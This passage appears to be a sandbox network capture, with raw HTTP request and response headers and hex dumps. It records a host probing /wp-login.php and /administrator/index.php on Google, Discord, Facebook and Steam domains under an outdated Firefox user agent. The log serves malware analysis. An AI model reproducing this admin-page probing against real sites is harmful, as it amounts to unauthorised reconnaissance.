https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: 2b568c22a9606bb828f4d6ff1c0c4f83
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                136192.168.2.662966142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC192OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 4b 46 33 63 6d 37 36 52 4b 65 30 51 4b 49 46 6d 5f 46 70 39 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VKF3cm76RKe0QKIFm_Fp9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                137192.168.2.663379162.159.135.232443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC322OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC498INHTTP/1.1 404 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Ray: 850abd5c1a3b452f-ATL
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 26 Jan 2024 19:46:37 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __dcfduid=f7108150c41711eea0b60fe64c998bd4; Expires=Sat, 03 Feb 2029 11:16:10 GMT; Max-Age=157680000; Path=/; Secure; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC2139INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 6e 6f 6e 63 65 2d 4d 54 49 77 4c 44 6b 30 4c 44 45 30 4d 79 77 78 4d 6a 49 73 4f 54 63 73 4d 54 4d 77 4c 44 45 35 4f 53 77 78 4e 54 41 3d 27 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 73 6c 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'nonce-MTIwLDk0LDE0MywxMjIsOTcsMTMwLDE5OSwxNTA=' https://discord.com https://www.googletagmanager.com https://connect.facebook.net https://www.google-analytics.com https://ssl.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC379INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 67 6e 38 43 7a 4e 42 57 5a 69 59 6a 31 6c 53 6c 78 42 71 4e 67 4b 59 36 6e 73 67 31 75 25 32 46 39 25 32 42 39 64 31 25 32 46 62 35 70 50 59 63 46 68 30 38 55 43 73 52 74 25 32 42 4b 45 36 34 5a 4a 62 25 32 42 53 47 75 45 51 56 50 25 32 42 64 74 64 70 31 38 36 55 39 5a 4f 79 4b 63 25 32 46 37 44 35 63 4c 73 42 25 32 46 4f 45 25 32 42 48 49 48 7a 36 49 38 53 4c 32 31 49 6d 4f 7a 34 4c 56 6d 6d 33 56 77 53 49 31 67 6e 71 37 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gn8CzNBWZiYj1lSlxBqNgKY6nsg1u%2F9%2B9d1%2Fb5pPYcFh08UCsRt%2BKE64ZJb%2BSGuEQVP%2Bdtdp186U9ZOyKc%2F7D5cLsB%2FOE%2BHIHz6I8SL21ImOz4LVmm3VwSI1gnq7"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 37 66 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 75 62 51 38 33 6b 7a 32 59 59 52 72 6c 65 4a 61 59 66 5f 43 59 62 76 44 5a 36 6c 58 56 6c 2d 4e 4c 5f 4d 57 58 31 55 6a 39 59 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 76 61 6c 69 64 61 74 65 2e 30 31 22 20 63 6f 6e 74 65 6e 74 3d 22 33 33 30 44 43 39 30 34 38 34 41 34 42 37 42 36 31 42 33 36 41 44 36 35 45 38 39 42 34 37 41 45 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff2<!DOCTYPE html><html lang="en-US"><head> <meta charset="utf-8" /> <meta name="google-site-verification" content="nubQ83kz2YYRrleJaYf_CYbvDZ6lXVl-NL_MWX1Uj9Y" /> <meta name="msvalidate.01" content="330DC90484A4B7B61B36AD65E89B47AE" /> <meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 44 69 73 63 6f 72 64 3c 2f 74 69 74 6c 65 3e 20 20 3c 21 2d 2d 20 65 6e 64 73 65 63 74 69 6f 6e 20 2d 2d 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 44 69 73 63 6f 72 64 22 2f 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: react-helmet="true">Page Not Found | Discord</title> ... endsection --><meta data-react-helmet="true" charset="utf-8"/><meta data-react-helmet="true" property="og:title" content="Page Not Found | Discord"/><meta data-react-helmet="true" property="og:ima
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 47 49 30 67 39 4f 2d 35 34 5f 53 69 74 63 67 6d 78 51 4b 78 6c 41 26 67 74 6d 5f 70 72 65 76 69 65 77 3d 65 6e 76 2d 32 26 67 74 6d 5f 63 6f 6f 6b 69 65 73 5f 77 69 6e 3d 78 27 3b 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6a 2c 20 66 29 3b 0a 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 27 73 63 72 69 70 74 27 2c 20 27 64 61 74 61 4c 61 79 65 72 27 2c 20 27 47 54 4d 2d 4e 37 42 56 43 32 57 27 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 65 6e 64 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 21 2d 2d 20 73 65 63 74 69 6f 6e 3a 67 74 6d 4e 6f 53 63 72 69 70 74 2d 2d 3e 0a 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: GI0g9O-54_SitcgmxQKxlA&gtm_preview=env-2&gtm_cookies_win=x'; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer', 'GTM-N7BVC2W'); </script> ... endsection --></head><body> ... section:gtmNoScript--> <noscript>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 38 33 20 32 34 2e 38 30 38 20 36 2e 39 33 35 38 37 20 32 34 2e 33 31 32 43 37 2e 31 35 32 38 36 20 32 34 2e 31 35 37 31 20 37 2e 33 36 39 38 36 20 32 33 2e 39 38 36 36 20 37 2e 35 37 31 33 35 20 32 33 2e 38 31 36 31 43 31 32 2e 36 32 34 31 20 32 36 2e 31 32 35 35 20 31 38 2e 30 39 36 39 20 32 36 2e 31 32 35 35 20 32 33 2e 30 38 37 36 20 32 33 2e 38 31 36 31 43 32 33 2e 33 30 34 36 20 32 33 2e 39 38 36 36 20 32 33 2e 35 30 36 31 20 32 34 2e 31 35 37 31 20 32 33 2e 37 32 33 31 20 32 34 2e 33 31 32 43 32 32 2e 38 38 36 31 20 32 34 2e 38 30 38 20 32 32 2e 30 31 38 32 20 32 35 2e 32 32 36 35 20 32 31 2e 31 30 33 37 20 32 35 2e 35 36 37 35 43 32 31 2e 35 38 34 32 20 32 36 2e 35 31 32 39 20 32 32 2e 31 34 32 32 20 32 37 2e 34 31 31 39 20 32 32 2e 37 36 32 31 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 83 24.808 6.93587 24.312C7.15286 24.1571 7.36986 23.9866 7.57135 23.8161C12.6241 26.1255 18.0969 26.1255 23.0876 23.8161C23.3046 23.9866 23.5061 24.1571 23.7231 24.312C22.8861 24.808 22.0182 25.2265 21.1037 25.5675C21.5842 26.5129 22.1422 27.4119 22.7621
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 36 32 20 32 31 2e 36 37 37 34 43 36 34 2e 35 32 31 37 20 32 31 2e 34 34 34 39 20 36 33 2e 37 30 30 33 20 32 31 2e 31 30 33 39 20 36 32 2e 39 37 31 38 20 32 30 2e 36 33 38 39 56 31 37 2e 38 33 33 35 43 36 33 2e 35 32 39 38 20 31 38 2e 32 36 37 35 20 36 34 2e 32 35 38 32 20 31 38 2e 36 30 38 35 20 36 35 2e 31 38 38 32 20 31 38 2e 38 38 37 35 43 36 36 2e 31 31 38 31 20 31 39 2e 31 36 36 35 20 36 37 2e 30 31 37 31 20 31 39 2e 33 30 36 20 36 37 2e 38 38 35 31 20 31 39 2e 33 30 36 43 36 38 2e 32 38 38 20 31 39 2e 33 30 36 20 36 38 2e 35 39 38 20 31 39 2e 32 35 39 35 20 36 38 2e 37 39 39 35 20 31 39 2e 31 35 31 43 36 39 2e 30 30 31 20 31 39 2e 30 34 32 35 20 36 39 2e 31 30 39 35 20 31 38 2e 39 31 38 35 20 36 39 2e 31 30 39 35 20 31 38 2e 37 36 33 35 43 36 39 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 62 21.6774C64.5217 21.4449 63.7003 21.1039 62.9718 20.6389V17.8335C63.5298 18.2675 64.2582 18.6085 65.1882 18.8875C66.1181 19.1665 67.0171 19.306 67.8851 19.306C68.288 19.306 68.598 19.2595 68.7995 19.151C69.001 19.0425 69.1095 18.9185 69.1095 18.7635C69.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 37 43 37 35 2e 39 34 36 32 20 31 33 2e 31 33 37 37 20 37 36 2e 36 39 30 31 20 31 32 2e 35 31 37 37 20 37 37 2e 36 36 36 36 20 31 32 2e 30 35 32 38 43 37 38 2e 36 34 33 20 31 31 2e 36 30 33 33 20 37 39 2e 38 32 31 20 31 31 2e 33 37 30 38 20 38 31 2e 31 38 34 39 20 31 31 2e 33 37 30 38 43 38 32 2e 38 37 34 33 20 31 31 2e 33 37 30 38 20 38 34 2e 32 36 39 33 20 31 31 2e 37 32 37 33 20 38 35 2e 33 38 35 32 20 31 32 2e 34 34 30 32 56 31 35 2e 35 32 34 36 43 38 34 2e 39 39 37 37 20 31 35 2e 32 36 31 31 20 38 34 2e 35 33 32 38 20 31 35 2e 30 32 38 36 20 38 34 2e 30 30 35 38 20 31 34 2e 38 37 33 36 43 38 33 2e 34 37 38 38 20 31 34 2e 37 30 33 31 20 38 32 2e 39 32 30 38 20 31 34 2e 36 32 35 36 20 38 32 2e 33 33 31 39 20 31 34 2e 36 32 35 36 43 38 31 2e 32 37 37 39
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7C75.9462 13.1377 76.6901 12.5177 77.6666 12.0528C78.643 11.6033 79.821 11.3708 81.1849 11.3708C82.8743 11.3708 84.2693 11.7273 85.3852 12.4402V15.5246C84.9977 15.2611 84.5328 15.0286 84.0058 14.8736C83.4788 14.7031 82.9208 14.6256 82.3319 14.6256C81.2779
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 39 34 20 31 34 2e 34 38 36 31 20 39 33 2e 32 36 31 39 20 31 34 2e 34 38 36 31 43 39 32 2e 35 33 33 35 20 31 34 2e 34 38 36 31 20 39 31 2e 39 37 33 39 20 31 34 2e 36 38 37 36 20 39 31 2e 35 35 35 35 20 31 35 2e 30 39 30 36 43 39 31 2e 31 35 32 35 20 31 35 2e 34 39 33 36 20 39 30 2e 39 33 35 35 20 31 36 2e 30 32 30 36 20 39 30 2e 39 33 35 35 20 31 36 2e 37 30 32 35 43 39 30 2e 39 33 35 35 20 31 37 2e 33 38 34 35 20 39 31 2e 31 33 37 20 31 37 2e 39 32 37 20 39 31 2e 35 35 35 35 20 31 38 2e 33 32 39 39 43 39 31 2e 39 37 33 39 20 31 38 2e 37 34 38 34 20 39 32 2e 35 33 33 35 20 31 38 2e 39 34 39 39 20 39 33 2e 32 36 31 39 20 31 38 2e 39 34 39 39 43 39 33 2e 39 35 39 34 20 31 38 2e 39 33 34 34 20 39 34 2e 35 33 32 39 20 31 38 2e 37 33 32 39 20 39 34 2e 39 33 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 94 14.4861 93.2619 14.4861C92.5335 14.4861 91.9739 14.6876 91.5555 15.0906C91.1525 15.4936 90.9355 16.0206 90.9355 16.7025C90.9355 17.3845 91.137 17.927 91.5555 18.3299C91.9739 18.7484 92.5335 18.9499 93.2619 18.9499C93.9594 18.9344 94.5329 18.7329 94.935
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 37 30 31 38 43 31 31 35 2e 32 38 38 20 31 37 2e 33 35 32 37 20 31 31 35 2e 34 38 39 20 31 37 2e 38 36 34 32 20 31 31 35 2e 39 30 38 20 31 38 2e 32 36 37 32 43 31 31 36 2e 33 32 36 20 31 38 2e 36 37 30 32 20 31 31 36 2e 38 36 39 20 31 38 2e 38 37 31 37 20 31 31 37 2e 35 36 36 20 31 38 2e 38 37 31 37 43 31 31 38 2e 32 36 35 20 31 38 2e 38 37 31 37 20 31 31 38 2e 38 32 33 20 31 38 2e 36 37 30 32 20 31 31 39 2e 32 34 32 20 31 38 2e 32 35 31 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 38 2e 39 38 38 35 20 31 32 2e 34 30 39 31 43 36 30 2e 31 37 37 32 20 31 32 2e 34 30 39 31 20 36 31 2e 31 34 32 39 20 31 31 2e 35 34 31 36 20 36 31 2e 31 34 32 39 20 31 30 2e 34 37 31 37 43 36 31 2e 31 34 32 39 20 39 2e 34 30 31 36 34 20 36 30 2e 31 37 37 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7018C115.288 17.3527 115.489 17.8642 115.908 18.2672C116.326 18.6702 116.869 18.8717 117.566 18.8717C118.265 18.8717 118.823 18.6702 119.242 18.2517Z"></path><path d="M58.9885 12.4091C60.1772 12.4091 61.1429 11.5416 61.1429 10.4717C61.1429 9.40164 60.1772


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                138192.168.2.66316131.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC654INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_l=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_n=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: 0b4iEZNvRkcMksQR3rhVwdrOw9iIiV0G/qniENiEauQK1WF1domFrJm4vbIXvdSH0c+CZFhatV8uRoP3U0GFmg==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                139192.168.2.66302523.4.32.216443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC202INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                140192.168.2.66409831.216.144.5443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC195OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
